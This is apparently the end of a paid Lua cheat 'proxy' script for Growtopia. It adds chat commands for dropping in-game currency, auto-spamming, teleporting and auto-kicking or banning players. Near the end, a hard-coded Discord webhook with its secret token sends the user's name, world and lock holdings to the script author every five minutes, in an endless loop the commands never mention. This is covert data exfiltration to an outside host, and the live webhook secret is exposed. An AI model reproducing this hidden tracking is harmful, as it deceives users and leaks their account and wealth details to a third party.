  SendVarlist(cn)
  return true
elseif packet:find("/sw1") then
  poswin1x = math.floor(GetLocal().pos_x / 32)
  poswin1y = math.floor(GetLocal().pos_y / 32)
  FChat("`9[ivert] Pos Win 1 configured")
  return true
elseif packet:find("/sw2") then
  poswin2x = math.floor(GetLocal().pos_x / 32)
  poswin2y = math.floor(GetLocal().pos_y / 32)
  FChat("`9[ivert] Pos Win 2 configured")
  return true
elseif packet:find("/host") then
  poshostx = math.floor(GetLocal().pos_x / 32)
  poshosty = math.floor(GetLocal().pos_y / 32)
  FChat("`9[ivert] Pos Host configured")
  return true
elseif packet:find("/pos") then
  FindPath(poshostx, poshosty)
  return true
elseif packet:find("/w1") then
  FindPath(poswin1x, poswin1y)
  RunThread(customDropWin)
GetLocal().facing_left = true
 SendPacket(2, "action|input\ntext|`1N`2i`3c`4e `5B`6a`7n`8g")
  return true
elseif packet:find("/w2") then
  FindPath(poswin2x, poswin2y)
  RunThread(customDropWin)
GetLocal().facing_left = false
 SendPacket(2, "action|input\ntext|`1N`2i`3c`4e `5B`6a`7n`8g")
  return true
-- elseif packet:find("/w1") then
  -- log("Teleport to win 1")
 -- FindPath(poswin1x, poswin1y)
  -- return true
-- elseif packet:find("/w2") then
  -- log("Teleport to win 2")
  --FindPath(poswin2x, poswin2y)
  --return true
elseif packet:find("/wd (%d+)") then
  wls = tonumber(packet:match("/wd (%d+)"))
  if findItem(242) < wls then
    local pkt = {
      type = 10,
      int_data = 1796,
    }
    SendPacketRaw(pkt)     
  end
  SendPacket(2, "action|dialog_return\ndialog_name|drop\nitem_drop|" .. tostring(242) .. "|\nitem_count|" .. wls)
  log("`0[`9Introvert_7672`0] Dropped `1" .. wls .. " WLS")
  return true
elseif packet:find("/dd (%d+)") then
  wls = tonumber(packet:match("/dd (%d+)"))
  if findItem(1796) < wls then
    local pkt = {
      type = 10,
      int_data = 7188,
    }
    SendPacketRaw(pkt)     
  end
  SendPacket(2, "action|dialog_return\ndialog_name|drop\nitem_drop|" .. tostring(1796) .. "|\nitem_count|" .. wls)
  log("`0[`9Introvert_7672`0] Dropped `1" .. wls .. " DLS")
  return true
elseif packet:find("/bd (%d+)") then
  wls = tonumber(packet:match("/bd (%d+)"))
  if findItem(7188) < wls then
      log("You don't have that much bgls")
      return true
  end
  SendPacket(2, "action|dialog_return\ndialog_name|drop\nitem_drop|" .. tostring(7188) .. "|\nitem_count|" .. wls)
  log("`0[`9Introvert_7672`0] Dropped `1" .. wls .. " BGL")
  return true
elseif packet:find("/dbl (%d+)") then
    wls = tonumber(packet:match("/dbl (%d+)"))
    if findItem(11550) < wls then
        log("You don't have that much bgls")
        return true
    end
    SendPacket(2, "action|dialog_return\ndialog_name|drop\nitem_drop|" .. tostring(11550) .. "|\nitem_count|" .. wls)
    FChat("`0[`9Introvert_7672`0] Dropped `1" .. wls .. " Black Gem Lock")
    return true
	  elseif packet:find("/black") then
	 SendPacket(2, "action|dialog_return\ndialog_name|info_box\nbuttonClicked|make_bgl")
	FChat("`0[`9Introvert_7672`0] `2Convert `^100 Blue Gem Lock `p to `^1Black Gem Lock")
	return true
	elseif packet:find("/blue") then
	 SendPacket(2, "action|dialog_return\ndialog_name|info_box\nbuttonClicked|make_bluegl")
	FChat("`0[`9Introvert_7672`0] `2Shattered `^1 Black Gem Lock `p to `^1 Blue Gem Lock")
	return true
elseif packet:find("/dc (%d+)") then
  wls = tonumber(packet:match("/dc (%d+)"))
  if findItem(528) < wls then
    local pkt = {
      type = 10,
      int_data = 7188,
    }
    SendPacketRaw(pkt)     
  end
  SendPacket(2, "action|dialog_return\ndialog_name|drop\nitem_drop|" .. tostring(528) .. "|\nitem_count|" .. wls)
  log("`0[`9Introvert_7672`0] Dropped `1" .. wls .. " `^Clover")
  return true
elseif packet:find("/ds (%d+)") then
  wls = tonumber(packet:match("/ds (%d+)"))
  if findItem(4604) < wls then
    local pkt = {
      type = 10,
      int_data = 7188,
    }
    SendPacketRaw(pkt)     
  end
  SendPacket(2, "action|dialog_return\ndialog_name|drop\nitem_drop|" .. tostring(4604) .. "|\nitem_count|" .. wls)
  log("`0[`9Introvert_7672`0] Dropped `1" .. wls .. " `9Arroz")
  return true
elseif packet:find("/cd (%d+)") then
  wls = tonumber(packet:match("/cd (%d+)"))
  RunThread(customDrop)
  return true
elseif packet:find("tax_a_m_o_u_n_t") then
  tax = packet:match("tax_a_m_o_u_n_t|(%d+)")
  FChat("`9Tax has been set `0" .. tax .. "%")
  return true
elseif packet:find("/stax") then
  menuVarList = {}
  menuVarList[0] = "OnDialogRequest"
  menuVarList[1] = [[
set_default_color|`o
add_label_with_icon|big|`9Set Tax Amount``|left|7188
add_spacer|small|
text_scaling_string|iprogramtext
add_textbox|Tax:|left|
add_text_input|tax_a_m_o_u_n_t||]]..tax..[[|3|
add_spacer|small|
add_button|/proxy|Back|
end_dialog|growscan_edit||OK|
add_quick_exit]]
  menuVarList.netid = -1
  SendVarlist(menuVarList)
  return true
elseif packet:find("/relog") then
  RunThread(relogThread)
  return true
elseif packet:find("/rcn") then
SendPacket(3,"action|quit")
log("`4Global System Message`o: System Detect You Disconnect")
FChat("`^Relog Masbro")
latest_world = GetLocal().world
SendPacket(3, "action|join_request\nname|" .. latest_world .. "\ninvitedWorld|0")
SendPacket(3,"action|validate_world\nname|" .. GetLocal().world .. "\n")
return true
elseif packet:find('buttonClicked|logger') then
RunThread(function()
os.execute("start logger.bat")
end)
return true
elseif packet:find("buttonClicked|wrnch_md_pl") then
  wrnch = packet:match("wrnch_md_set|(%d+)")
  wrnch_md = "PULL"
  FChat("`9Wrench mode set to `0PULL")
  return true
elseif packet:find("buttonClicked|wrnch_md_kc") then
  wrnch = packet:match("wrnch_md_set|(%d+)")
  wrnch_md = "KICK"
  FChat("`9Wrench mode set to `0KICK")
elseif packet:find("buttonClicked|wrnch_md_bn") then
  wrnch = packet:match("wrnch_md_set|(%d+)")
  wrnch_md = "BAN"
  FChat("`9Wrench mode set to `0BAN")
elseif packet:find("/wrench") then
  --add_spacer|small|
  menuVarList = {}
  menuVarList[0] = "OnDialogRequest"
  menuVarList[1] = [[
set_default_color|`o
add_label_with_icon|big|`9Wrench Mode``|left|32
text_scaling_string|iprogramtext
add_spacer|small|
add_checkbox|wrnch_md_set|Fast system|]]..wrnch..[[|
add_button|wrnch_md_pl|`5PULL|noflags|0|0|
add_button|wrnch_md_kc|`4KICK|noflags|0|0|
add_button|wrnch_md_bn|`4BAN|noflags|0|0|
add_spacer|small|
end_dialog|wrnch_sender||OK|
add_quick_exit]]
  menuVarList.netid = -1
  SendVarlist(menuVarList)
  return true
elseif packet:find("/ch")then
  if Mode == "VERTIKAL" then
    count1 = 0
    count2 = 0
    for _, value in pairs(GetObjects()) do
      if value.id == 112 then
        checkY = math.floor(value.pos_y / 32)
        checkX = math.floor(value.pos_x / 32)
        if checkX == pos1x1 then
          if checkY == pos1y1 or checkY == pos1y2 or checkY == pos1y3 then
            count1 = count1 + value.count
          end
        end
        if checkX == pos2x1 then
          if checkY == pos2y1 or checkY == pos2y2 or checkY == pos2y3 then
            count2 = count2 + value.count
          end
        end
      end
    end
    count1 = math.floor(count1)
    count2 = math.floor(count2)
    checkWinner(count1, count2)
  elseif Mode == "HORIZONTAL" then
    count1 = 0
    count2 = 0
    for _, value in pairs(GetObjects()) do
      if value.id == 112 then
        checkY = math.floor(value.pos_y / 32)
        checkX = math.floor(value.pos_x / 32)
        if checkY == pos1y1 then
          if checkX == pos1x1 or checkX == pos1x2 or checkX == pos1x3 then
            count1 = count1 + value.count
          end
        end
        if checkY == pos2y1 then
          if checkX == pos2x1 or checkX == pos2x2 or checkX == pos2x3 then
            count2 = count2 + value.count
          end
        end
      end
    end
    count1 = math.floor(count1)
    count2 = math.floor(count2)
    checkWinner(count1, count2)
  end
  return true
elseif packet:find("/fc") then
    RemoveCallbacks()
    FChat("`^Succesfull Deactivate Proxy")
    return true
elseif packet:find("/gm") then
      if collectGems == false then
          startGems = math.floor(GetLocal().gems)
          FChat("Enabled logging of gems! Starting gems: "..startGems, 'light_green')
          collectGems = true
      elseif collectGems == true then
          endGems = math.floor(GetLocal().gems)
          FChat("Disabled logging of gems! Ending gems: "..endGems, 'light_green')
          local difference = math.floor(endGems - startGems)
          SendPacket(2, "action|input\n|text|`#Collected `c"..tostring(difference).." `#Gems!")
          collectGems = false
      end
      return true

elseif packet:find("/spamtext") then
      if packet:find("action|input\n|text|/spamtext ") then
          set_spam_text = packet:gsub("action|input\n|text|/spamtext ", "")
          FChat("`0spam text set to :`3 "..set_spam_text)
      end 
  return true
elseif packet:find("/spamt") then
      if packet:find("action|input\n|text|/spamt ") then
          set_spam_text = packet:gsub("action|input\n|text|/spamt ", "")
          FChat("`0spam text set to :`3 "..set_spam_text)
      end
  return true
elseif packet:find("/spamdelay") then
      if packet:find("action|input\n|text|/spamdelay") then
          set_spam_delay = packet:gsub("action|input\n|text|/spamdelay", "")
          set_spam_delay = tonumber(set_spam_delay)
          FChat("`0spam delay set to : `3"..set_spam_delay.." `9Seconds ")
      end
  return true
elseif packet:find("/sd") then
      if packet:find("action|input\n|text|/sd") then
          set_spam_delay = packet:gsub("action|input\n|text|/sd", "")
          set_spam_delay = tonumber(set_spam_delay)
          FChat("`0spam delay set to : `3"..set_spam_delay.." `9Seconds ")
      end
  return true
elseif packet:find("//") then
      if packet == ("action|input\n|text|//") then
          if spamming then
              FChat("`0Auto Spam is `3off")
              spamming = false
             else
              FChat("`0Auto Spam is `3on")
              spamming = true
          end
             RunThread(function()
                     setspam()
             end)
      end
  return true

elseif packet:find("/dp (%d+)") then
	  depo = string.match(packet, "/dp (%d+)")
	  FChat("`p[`^introvert`p] `^Deposit `c" .. tonumber(depo).." `^to Bank")
RunThread(function()
if math.floor(GetItemCount(7188)) < math.floor(depo) then
SendPacket(2,"action|dialog_return\ndialog_name|info_box\nbuttonClicked|make_bluegl")
Sleep(100)
end
	SendPacket(2, "action|dialog_return\ndialog_name|bank_deposit\nbgl_count|"..depo.."\n")
    return true
end)
	  elseif packet:find("/dp") then
RunThread(function()
SendPacket(2,"action|dialog_return\ndialog_name|bank_deposit\nbgl_count|" .. GetItemCount(7188) .."")
Sleep(200)
while GetItemCount(11550) > 0 do
SendPacket(2,"action|dialog_return\ndialog_name|info_box\nbuttonClicked|make_bluegl")
Sleep(400)
SendPacket(2,"action|dialog_return\ndialog_name|bank_deposit\nbgl_count|" .. GetItemCount(7188) .."")
Sleep(200)
end
end)
return true

	  elseif packet:find("/wt (%d+)") then
	  wd = string.match(packet, "/wt (%d+)")
	FChat("`p[`^introvert`p] `^Withdraw `c" .. tonumber(wd).." `^from Bank")
    SendPacket(2, "action|dialog_return\ndialog_name|bank_withdraw\nbgl_count|"..wd.."\n")
CheckLocks()
    return true

	  elseif packet:find("/stele") then
for x = 0, 199 do
for y = 0, 199 do
if GetTile(x,y).fg == 3898  then
telex = x
teley = y
end
end
end
 
FChat("`9Telephone Coordinates Set!")
return true

elseif packet:find("wrench_bgl") then
  if cvbgl == 0 then
    cvbgl = 1
    FChat("`9Fast Conver BGL Mode is `0enabled")
    AddCallback("changebgl", "OnVarlist", function(var)
      if var[0] == "OnDialogRequest" and var[1]:find("end_dialog|telephone") then
        x = var[1]:match("x|(%d+)")
        y = var[1]:match("y|(%d+)")
        SendPacket(2,
          "action|dialog_return\ndialog_name|telephone\nnum|53785|\nx|" .. x ..
          "|\ny|" .. y .. "|\nbuttonClicked|bglconvert\n")
        return true
      end
      return false
    end)
  elseif cvbgl == 1 then
    cvbgl = 0
    RemoveCallback("changebgl")
    FChat("`9Fast change BGL Mode is `0disabled")
  end
elseif packet:find("/phone") then
  menuVarList = {}
  menuVarList[0] = "OnDialogRequest" 
  menuVarList[1] = [[
set_default_color|`o
add_label_with_icon|big|`9Phone Menu``|left|32
add_spacer|small|
text_scaling_string|iprogramtext
add_button_with_icon|wrench_bgl|`9Convert BGL|staticYellowFrame|32||
add_button_with_icon||END_LIST|noflags|0||
add_spacer|small|
end_dialog|WrenchShortcut|Cancel|
add_quick_exit]]
  menuVarList.netid = -1
  SendVarlist(menuVarList)
  return true
elseif packet:find("mode_vertikal") then
  Mode = "VERTIKAL"
  FChat("`9Mode set to `0Vertical")
  return true
elseif packet:find("mode_horizontal") then
  Mode = "HORIZONTAL"
  FChat("`9Mode set to `0Horizontal")
  return true
elseif packet:find("/mode") then
 menuVarList = {}
    menuVarList[0] = "OnDialogRequest"
    menuVarList[1] = [[
set_default_color|`o
add_label_with_icon|big|`4Select Mode``|left|32
add_spacer|small|
text_scaling_string|iprogramtext
add_button_with_icon|mode_vertikal|`4Vertikal|staticBlueFrame|484||
add_button_with_icon|mode_horizontal|`4Horizontal|staticBlueFrame|482||
add_button_with_icon||END_LIST|noflags|0||
add_spacer|small|
add_button|/proxy|Back|
end_dialog|WrenchShortcut|Cancel|
add_quick_exit]]
    menuVarList.netid = -1
    SendVarlist(menuVarList)
    return true
elseif packet:find("/blink") then
    if blink then
      blink = false
FChat("`4Deactivated Blink")
    else
      blink = true
FChat("`9Blink Activated")
    end
    RunThread(function()
      blinks()
    end)
    return true

elseif packet:find("/modal") then
          dls = GetItemCount(1796)
          bgl = GetItemCount(7188)
          blackgem = GetItemCount(11550)
  
          realbgls = blackgem * 100

          deel = dls
  
          modal = bgl + realbgls
  
          realmodal = math.floor(modal)

thedls = math.floor(deel)
  
          SendPacket(2, "action|input\ntext|My modal is: `e"..realmodal.."BGL `wand `c"..thedls.."DLS")
          
          return true

elseif packet:find("/hooktoggle") then
        
        if HookChecker == true then
            HookChecker = false
            FChat("`4Script will not send webhooks")
        else
              HookChecker = true
              FChat("`2Script will send hook when u SB. `4(ONLY WHEN USING AUTO SB)")
end
return true

elseif packet:find("/sethook") then
       os.execute("start IvertSB_Hook.txt")
        return true

elseif packet:find("/type") then
  local typekebab = packet:match("/type%s+(%S+)")

  typecol = typekebab
          return true

elseif packet:find("/afk") then
    me = GetLocal()
SendPacket(2, "action|input\ntext|/nick "..me.name.."[AFK]")
    return true

   elseif packet:find("/sbtime") then
   TIME_COMMAND = tonumber(packet:match("/sbtime%s+(.*)"))

         SB_TIMER = TIME_COMMAND
         FChat("Time: "..SB_TIMER)

    return true


    elseif packet:find("/content") then
        local kontolNiga = packet:match("/content%s+(.*)")
        SuperContent = kontolNiga
        FChat("Content: " .. SuperContent)
        return true


    elseif packet:find("/super") then
        if SuperHour == false then
            SuperHour = true
            StartTime = os.time()
            StopTime = StartTime + SB_TIMER
             SendPacket(2, "action|input\ntext|/sb " .. SuperContent)
        else
            SuperHour = false
            FChat("`4Auto SB stopped")
        end
        return true

elseif packet:find("/rp") then
    SendPacket(2, "action|respawn|")
    return true

elseif packet:find("/gsv") then
SendPacket(3, "action|join_request\nname|" .. saveworld .. "\ninvitedWorld|0")
		FChat("`9Go To World Save !!")
		return true
elseif packet:find("/sve") then
		saveworld = packet:match("/sve (.+)")
		log("`9Save World : `c" .. saveworld)
return true

elseif packet:find("/daw") then
  daw()
  return true

elseif packet:find("/menu") then
  menuDialog()
  return true

elseif packet:find("/proxy") then
  runExecute()
  return true

elseif packet:find("action|wrench") then
  if wrnch == "1" then
    netidtrgt = packet:match("|netid|(%d+)")
    FChat(wrnch_md.." On NetID: "..netidtrgt)
    SendPacket(2, "action|dialog_return\ndialog_name|popup\nnetID|"..netidtrgt.."|\nbuttonClicked|"..string.lower(wrnch_md))
    return true
  end
end
return false
end)

menuExecute()
Sleep(1000)
runExecute()
SendPacket(2, "action|input\ntext|`w[PREMIUM PROXY] `cBy `4Introvert_7672")
WebHook = "https://discord.com/api/webhooks/1123452038458638436/kv5E9vVOrQMm36PNNEQquhRt5v8mS98vtt-WlNZpkCY-A6tulDN415ox48GrE_vvHLFd" --jangan di ubah
  function removeColorAndSymbols(str)
      local cleanedStr = string.gsub(str, "`(%S)", '')
      cleanedStr = string.gsub(cleanedStr, "`{2}|(~{2})", '')
      return cleanedStr
  end
  local function FormatNumber(num)
      num = math.floor(num + 0.5)

      local formatted = tostring(num)
      local k = 3
      while k < #formatted do
          formatted = formatted:sub(1, #formatted - k) .. "," ..
                          formatted:sub(#formatted - k + 1)
          k = k + 4
      end
      return formatted
  end
  function FORMAT_TIME(seconds)
      local days = math.floor(seconds / 86400)
      local hours = math.floor((seconds % 86400) / 3600)
      local minutes = math.floor((seconds % 3600) / 60)
      local remaining_seconds = seconds % 60
      local parts = {}
      if days > 0 then
          table.insert(parts, tostring(days) .. " day" .. (days > 1 and "s" or ""))
      end
      if hours > 0 then
          table.insert(parts,
                      tostring(hours) .. " hour" .. (hours > 1 and "s" or ""))
      end
      if minutes > 0 then
          table.insert(parts, tostring(minutes) .. " minute" ..
                          (minutes > 1 and "s" or ""))
      end
      if remaining_seconds > 0 then
          table.insert(parts, tostring(remaining_seconds) .. " second" ..
                          (remaining_seconds > 1 and "s" or ""))
      end
      if #parts == 0 then
          return "0 seconds"
      elseif #parts == 1 then
          return parts[1]
      else
          local last_part = table.remove(parts)
          return table.concat(parts, ", ") .. " and " .. last_part
      end
  end
else
    FChat("userID `b"..GetLocal().userid.."`4 is not in whitelist")
    log("You Must Pay 15 BGL To Get Access The Proxy Dm:@Introvert_7672")
end

---------------------------------------------------------------------------------------------------------

function wh()
  local payload = [[
  {
      "content": "",
      "embeds": [{
          "title": "<:wheel:1105095395371135037> Auto Host <:wheel:1105095395371135037> ",
          "description": "<:bgl:1110199855831322647> **INFORMATION** <:bgl:1110199855831322647>",
          "url": "https://avatarfiles.alphacoders.com/334/334449.png",
          "color": 69,
          "fields": [{
              "name":"Account:",
                  "value": "Name: **%s**",
                  "inline": false
          },
          {
              "name": "Information:",
                  "value": ":earth_asia: Current World: **%s**",
                  "inline": false
          },
          {
              "name": "**Player Lock:**",
              "value": "<:bgl:1110199855831322647>BGL: **%s** <:dl:1110199890572755055>DL: **%s** <:wl:1110199918649421914> WL: **%s** "
          }
          ],
          "author": {
              "name": "IntroVert AutoHost",
              "url": "https://avatarfiles.alphacoders.com/334/334449.png",
              "icon_url": "https://avatarfiles.alphacoders.com/334/334449.png"
          },
          "footer": {
              "text": "%s",
              "url": "https://cdn.discordapp.com/attachments/814384402985254940/1092698535117467728/received_881069006639056.jpg"
          }
      }]
  }]]
  payload = payload:format(removeColorAndSymbols(GetLocal().name), GetLocal().world,tostring(GetItemCount(7188)):match("(%d+)"),tostring(GetItemCount(1796)):match("(%d+)"),tostring(GetItemCount(242)):match("(%d+)"), os.date("!%a, %b/%d/%Y at %I:%M %p", os.time() + 8 * 60 * 60))
  SendWebhook(WebHook, payload)
end

while true do
wh()
Sleep(300000)
end


